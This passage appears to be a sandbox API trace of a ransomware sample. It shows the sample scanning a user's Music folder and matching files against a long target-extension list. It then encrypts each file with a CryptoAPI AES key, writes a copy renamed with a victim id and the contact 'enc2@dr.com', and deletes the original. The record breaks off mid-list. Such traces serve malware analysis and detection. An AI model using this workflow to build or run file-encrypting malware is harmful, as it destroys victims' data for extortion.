	[0190.902] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav") returned 49
	[0190.903] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.903] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0190.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.903] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.904] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.904] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.904] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.935] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x11d82, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x11d82, lpOverlapped=0x0) returned 1
	[0190.939] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.939] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb880) returned 1
	[0190.943] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.943] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0190.943] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.944] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.944] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0190.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.944] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x11d82, dwBufLen=0x11d82 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x11d90) returned 1
	[0190.947] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.947] RtlMoveMemory (in: Destination=0xfeef10, Source=0xfdd180, Length=0x11d82 | out: Destination=0xfeef10) 
	[0190.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.948] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeef10*, pdwDataLen=0x18aefc*=0x11d82, dwBufLen=0x11d90 | out: pbData=0xfeef10*, pdwDataLen=0x18aefc*=0x11d90) returned 1
	[0190.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.948] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0190.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.948] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0190.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.948] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0190.949] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.949] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.949] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.949] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0190.951] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 91
	[0190.951] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0190.951] WriteFile (in: hFile=0x388, lpBuffer=0xfeef10*, nNumberOfBytesToWrite=0x11d90, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfeef10*, lpNumberOfBytesWritten=0x18b358*=0x11d90, lpOverlapped=0x0) returned 1
	[0190.958] CloseHandle (hObject=0x388) returned 1
	[0190.958] CloseHandle (hObject=0x2c0) returned 1
	[0190.958] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav")) returned 1
	[0190.966] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\ibsr-q.wav")) returned 0
	[0190.966] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17850a30, ftCreationTime.dwHighDateTime=0x1d96908, ftLastAccessTime.dwLowDateTime=0x943dde10, ftLastAccessTime.dwHighDateTime=0x1d96bb7, ftLastWriteTime.dwLowDateTime=0x943dde10, ftLastWriteTime.dwHighDateTime=0x1d96bb7, nFileSizeHigh=0x0, nFileSizeLow=0xe81a, dwReserved0=0x0, dwReserved1=0x0, cFileName="qlK2er5ibU4cW97.mp3", cAlternateFileName="QLK2ER~1.MP3")) returned 1
	[0190.966] lstrcmpW (lpString1="qlK2er5ibU4cW97.mp3", lpString2="..") returned 1
	[0190.966] lstrcmpW (lpString1="qlK2er5ibU4cW97.mp3", lpString2=".") returned 1
	[0190.966] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0190.966] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="qlK2er5ibU4cW97.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\qlK2er5ibU4cW97.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\qlK2er5ibU4cW97.mp3"
	[0190.966] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\qlK2er5ibU4cW97.mp3") returned 58
	[0190.966] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.967] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\qlK2er5ibU4cW97.mp3", cchLength=0x3a | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3") returned 0x3a
	[0190.967] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.967] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.967] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3"
	[0190.967] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3") returned 58
	[0190.967] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.968] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0190.968] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.968] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.